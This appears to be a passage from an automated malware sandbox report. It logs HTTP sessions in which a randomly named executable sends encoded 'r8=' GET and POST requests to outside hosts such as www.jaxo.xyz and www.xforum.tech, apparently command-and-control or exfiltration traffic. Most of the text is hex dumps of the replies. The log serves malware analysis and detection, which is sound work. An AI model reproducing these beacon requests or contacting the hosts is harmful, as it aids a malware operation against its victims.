                                        Data Raw: 72 38 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 41 74 2b 6c 72 43 6f 68 65 41 70 79 65 55 54 41 77 67 77 76 55 34 63 54 52 55 4e 6b 72 73 65 6e 67 6c 33 59 30 56 30 4a 46 35 61 4a 2b 66 33 77 39 35 64 70 50 2b 47 64 2f 54 54 36 74 72 51 30 65 50 50 46 47 38 55 38 79 4c 6d 44 6f 32 44 46 37 32 52 4b 2f 45 48 46 44 78 41 37 51 4b 6d 74 34 59 35 75 59 38 39 43 71 5a 5a 63 7a 4d 42 59 57 33 53 53 51 73 68 56 39 49 62 6e 33 59 56 58 39 66 71 76 78 2b 51 45 33 52 52 68 2b 63 78 6e 79 71 31 67 70 61 6d 6a 57 64 6d 66 6f 77 52 38 53 61 55 74 49 76 2b 72 56 47 6d 36 65 53 7a 45 54 65 2f 42 79 59 58 4a 7a 57 77 79 68 56 67 2b 55 63 42 4a 35 75 69 35 38 64 78 6e 70 53 66 63 63 68 41 4c 6c 51 42 43 47 6d 46 43 6f 53 48 46 44 47 6d 52 73 79 49 78 6b 46 79 59 4a 49 45 73 79 34 31 47 7a 54 69 56 50 4a 39 70 70 52 63 68 55 31 72 49 37 67 75 69 66 4a 34 45 41 6b 4e 36 46 76 53 42 39 76 37 49 4d 38 34 72 71 2b 73 39 52 64 62 71 51 [TRUNCATED]
                                        Data Ascii: r8=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyAt+lrCoheApyeUTAwgwvU4cTRUNkrsengl3Y0V0JF5aJ+f3w95dpP+Gd/TT6trQ0ePPFG8U8yLmDo2DF72RK/EHFDxA7QKmt4Y5uY89CqZZczMBYW3SSQshV9Ibn3YVX9fqvx+QE3RRh+cxnyq1gpamjWdmfowR8SaUtIv+rVGm6eSzETe/ByYXJzWwyhVg+UcBJ5ui58dxnpSfcchALlQBCGmFCoSHFDGmRsyIxkFyYJIEsy41GzTiVPJ9ppRchU1rI7guifJ4EAkN6FvSB9v7IM84rq+s9RdbqQ4UXsjrbnuWdALFCLq5sBrWS1dJfgmGnCq6Pbe5pXXsVd2yR3/bZGhMIvS/CWEAcOhWnUhp4HN6UpjzaRH+NMCNJcLOsJWA0pZGp9IAVFHc2GbEJvIJ8Uw22Rsi4NiiPi7LaeEGYunIK/Dnea1OL/VgZ8Ku49v9A7dG221fDbiIrMpjPTV6Xnz8ODHAMWcSiwKHJaX3oxV1pA38tXB9WoFih3Wb1rBfGhN6vM/apC80roizY4FrshY1Nydu1q/e8f8sbTiEo4PC1W/GUSCMW+01UJKtVoDNd5fWXW3vyXrILDDsWqtWB0G1kvPL86eZBQc/UJC9ap8P4MwTF70uaBx06v6anyYW/U1s3kAmTici++KlbmQfIEkE52jiJjuloSRuWKhckRu3zx8ZtV1olz/CCWc9MdHj9cT+bMOd4HprglbJDe9V8fxZccttK90Bu4x40DVS5r9CNV2/LnWIM5UeqQf9I6+ulrKMslZDIkDPc9YqKDoDCSg4A2+2Qi1pnBhczhYekVCpalPelxSXqiM04OQACw3a+64aXDgMfbomY94ppArfkgZD3I01uByJQWQQci3Clsb31G5l4XDWcCDy0Xah7cI0s8/MPdY8vrHRt94EGa2cqrhpqOqpALGhez7GbQd+F0UyDNtoCdXTP3+5Va2oDvJn3TeI [TRUNCATED]
                                        Sep 3, 2024 13:54:48.140322924 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:47 GMT
                                        Server: Apache
                                        Content-Length: 13840
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                        Sep 3, 2024 13:54:48.140471935 CEST | 1236 | IN | Data Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                        Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                        Sep 3, 2024 13:54:48.140487909 CEST | 1236 | IN | Data Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                        Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                        Sep 3, 2024 13:54:48.140501022 CEST | 1236 | IN | Data Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                        Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                        Sep 3, 2024 13:54:48.140515089 CEST | 896 | IN | Data Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                                        Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                        Sep 3, 2024 13:54:48.140590906 CEST | 1236 | IN | Data Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                        Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                        Sep 3, 2024 13:54:48.140625000 CEST | 1236 | IN | Data Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                        Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                                        Sep 3, 2024 13:54:48.140636921 CEST | 1236 | IN | Data Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                                        Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                                        Sep 3, 2024 13:54:48.140672922 CEST | 1236 | IN | Data Raw: 63 2d 2e 32 36 35 2d 31 2e 31 37 37 2d 31 2e 34 37 37 2d 32 2e 31 35 33 2d 32 2e 35 31 2d 31 2e 37 38 34 2d 2e 35 34 38 2e 31 39 35 2d 2e 36 35 33 20 31 2e 31 35 36 2d 2e 31 30 34 20 31 2e 34 34 32 2e 32 39 34 2e 31 35 33 2e 35 33 2e 33 39 37 2e
                                        Data Ascii: c-.265-1.177-1.477-2.153-2.51-1.784-.548.195-.653 1.156-.104 1.442.294.153.53.397.762.655.326.36.549.611.988.784.564.223.992-.535.864-1.097M100.988 4.781c.03-.437-.169-.702-.568-.724-.906-.33-1.89.849-2.3 1.608-.47.873.538 1.63 1.223 1.22.683-
                                        Sep 3, 2024 13:54:48.140685081 CEST | 1236 | IN | Data Raw: 2e 31 34 38 2e 39 38 32 2e 32 35 20 31 2e 34 36 2e 31 39 36 2e 39 30 37 2e 38 34 39 2e 31 38 32 2e 37 30 33 2d 2e 37 34 35 4d 37 38 2e 39 35 37 20 32 34 2e 34 39 36 63 2e 30 36 38 2d 2e 33 31 2e 30 35 2d 2e 36 31 36 2d 2e 30 32 2d 2e 39 31 2d 2e
                                        Data Ascii: .148.982.25 1.46.196.907.849.182.703-.745M78.957 24.496c.068-.31.05-.616-.02-.91-.077-.321-.14-.65-.183-1.002-.099-.82-.671-.76-.736.076-.056.71.019 1.361.23 1.918.132.348.265.461.467.377-.18.076.075.038.116.016.071-.038.117-.183.135-.33.01-.0
                                        Sep 3, 2024 13:54:48.145411968 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 66
                                        Data Ascii: </g> </g> </g> <g fill-rule="nonzero" stroke="#979797" stroke-linecap="round" stroke-width="1.8" class="left-sparks"> <path d="M23.684 5.789L30 1.158" transform="ro


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        20 | 192.168.2.4 | 49757 | 66.29.149.180 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:50.042973995 CEST | 478 | OUT | GET /f9bc/?r8=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.jaxo.xyz
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:54:50.599783897 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:50 GMT
                                        Server: Apache
                                        Content-Length: 13840
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                        Sep 3, 2024 13:54:50.599802017 CEST | 1236 | IN | Data Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
                                        Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}
                                        Sep 3, 2024 13:54:50.599813938 CEST | 1236 | IN | Data Raw: 31 39 36 2d 34 2e 31 2d 32 35 2e 37 2d 31 2e 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d
                                        Data Ascii: 196-4.1-25.7-1.774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.71
                                        Sep 3, 2024 13:54:50.599836111 CEST | 1236 | IN | Data Raw: 39 20 32 30 2e 38 20 36 35 2e 31 37 35 20 32 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e
                                        Data Ascii: 9 20.8 65.175 21.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34
                                        Sep 3, 2024 13:54:50.599850893 CEST | 1236 | IN | Data Raw: 20 33 2e 32 38 39 20 31 2e 34 35 38 20 32 31 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e
                                        Data Ascii: 3.289 1.458 21.239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161
                                        Sep 3, 2024 13:54:50.599862099 CEST | 1236 | IN | Data Raw: 34 38 2e 32 33 37 2d 2e 34 32 39 2d 2e 30 35 33 2d 2e 38 35 2d 2e 35 33 32 2d 2e 39 38 37 4d 32 31 2e 37 32 32 20 31 30 2e 31 30 31 63 2d 2e 34 38 34 2d 2e 32 38 2d 31 2e 31 36 2e 30 38 2d 31 2e 35 34 32 2e 33 37 38 2d 2e 35 37 2e 34 34 34 2d 2e
                                        Data Ascii: 48.237-.429-.053-.85-.532-.987M21.722 10.101c-.484-.28-1.16.08-1.542.378-.57.444-.957.924-1.152 1.628-.21.764.802 1.182 1.296.663.4-.42.901-.746 1.308-1.172.319-.334.594-1.205.09-1.497M23.513 15.078c-.385.414-.505 1.566-.513 2.381-.005.47.333.
                                        Sep 3, 2024 13:54:50.599874020 CEST | 1236 | IN | Data Raw: 35 20 32 2e 35 32 38 2e 30 35 35 2e 35 31 2e 36 37 38 2e 36 36 34 2e 37 34 31 2e 30 38 2e 30 36 38 2d 2e 36 32 38 2e 34 32 2d 32 2e 34 30 35 2d 2e 33 30 36 2d 32 2e 36 30 38 4d 35 34 2e 38 30 33 20 31 36 2e 33 30 31 63 2d 2e 30 36 35 2d 2e 33 34
                                        Data Ascii: 5 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052 2.313.405 2.636.225.16.545-.077.512-.623-.024-.375-.13-.676-.195-1.027M39.534 21.024c-.423.212-.58 1
                                        Sep 3, 2024 13:54:50.599888086 CEST | 1236 | IN | Data Raw: 35 30 33 20 31 2e 30 32 33 2e 37 38 2e 33 34 38 2e 33 30 31 20 31 2e 37 33 38 2e 37 38 38 20 31 2e 35 38 36 2d 2e 32 34 35 2d 2e 31 34 31 2d 2e 39 36 33 2d 2e 37 38 39 2d 31 2e 36 35 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38
                                        Data Ascii: 503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.02
                                        Sep 3, 2024 13:54:50.599900961 CEST | 1236 | IN | Data Raw: 30 31 2e 30 39 36 2d 2e 30 30 31 2e 32 30 34 20 30 20 2e 32 39 37 20 30 20 2e 31 34 2d 2e 30 31 36 2e 32 39 34 2d 2e 30 32 35 2e 34 33 34 2d 2e 30 31 32 2e 31 38 31 2d 2e 30 34 33 2e 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35
                                        Data Ascii: 01.096-.001.204 0 .297 0 .14-.016.294-.025.434-.012.181-.043.357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.
                                        Sep 3, 2024 13:54:50.599912882 CEST | 1236 | IN | Data Raw: 33 35 2e 31 2d 2e 30 30 34 2e 32 37 2e 30 34 37 2e 35 33 33 2e 33 37 39 2e 36 36 35 2e 31 38 36 2e 30 37 33 2e 34 35 38 2e 30 32 2e 35 34 33 2d 2e 31 34 6c 2e 30 32 37 2d 2e 30 35 33 63 2e 30 36 2d 2e 31 31 34 2e 30 38 33 2d 2e 32 36 36 2d 2e 30
                                        Data Ascii: 35.1-.004.27.047.533.379.665.186.073.458.02.543-.14l.027-.053c.06-.114.083-.266-.025-.372M106.798 22.22c-.107-.292-.757-.304-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716
                                        Sep 3, 2024 13:54:50.604759932 CEST | 1236 | IN | Data Raw: 74 65 28 2d 39 30 20 31 35 37 20 31 33 29 20 6d 61 74 72 69 78 28 2d 31 20 30 20 30 20 31 20 36 2e 33 31 36 20 30 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 35 2e 37 38 39 20 34 2e 36 33 32 4c
                                        Data Ascii: te(-90 157 13) matrix(-1 0 0 1 6.316 0)"/> <path d="M15.789 4.632L15.789 0" transform="rotate(-90 157 13)"/> </g> <g fill-rule="nonzero" stroke="#979797" stroke-linecap="round" stroke-width="1.8" class="


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        21 | 192.168.2.4 | 49758 | 103.224.182.242 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:55.952208996 CEST | 740 | OUT | POST /647x/ HTTP/1.1
                                        Host: www.xforum.tech
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.xforum.tech
                                        Referer: http://www.xforum.tech/647x/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 38 67 68 35 75 6b 50 30 6c 55 43 6e 62 75 6b 77 39 69 2f 59 36 74 67 57 2b 57 39 42 49 34 68 47 36 31 6b 51 6f 71 74 55 4d 61 47 64 49 36 76 54 44 79 4e 65 37 65 62 4a 2b 41 4e 6d 2f 63 6f 56 53 6a 4a 74 79 67 4d 57 69 78 44 56 79 64 7a 32 6a 30 38 59 56 77 55 47 74 4f 4b 36 53 63 73 7a 5a 45 39 64 62 33 6d 68 2b 6b 73 77 66 56 6e 46 45 6b 2b 7a 64 41 6b 63 38 73 4c 2f 47 39 57 58 4e 74 64 36 36 4f 6e 79 67 4f 43 58 73 50 68 41 6e 65 64 74 6c 61 4b 50 6f 66 38 4a 34 42 58 74 61 72 73 2f 72 6a 39 51 50 4f 30 6e 74 64 38 6d 66 6a 30 66 4c 51 3d 3d
                                        Data Ascii: r8=Ily3CeU2s+qA8gh5ukP0lUCnbukw9i/Y6tgW+W9BI4hG61kQoqtUMaGdI6vTDyNe7ebJ+ANm/coVSjJtygMWixDVydz2j08YVwUGtOK6ScszZE9db3mh+kswfVnFEk+zdAkc8sL/G9WXNtd66OnygOCXsPhAnedtlaKPof8J4BXtars/rj9QPO0ntd8mfj0fLQ==
                                        Sep 3, 2024 13:54:56.563483000 CEST | 872 | IN | HTTP/1.1 200 OK
                                        date: Tue, 03 Sep 2024 11:54:56 GMT
                                        server: Apache
                                        set-cookie: __tad=1725364496.8828139; expires=Fri, 01-Sep-2034 11:54:56 GMT; Max-Age=315360000
                                        vary: Accept-Encoding
                                        content-encoding: gzip
                                        content-length: 577
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
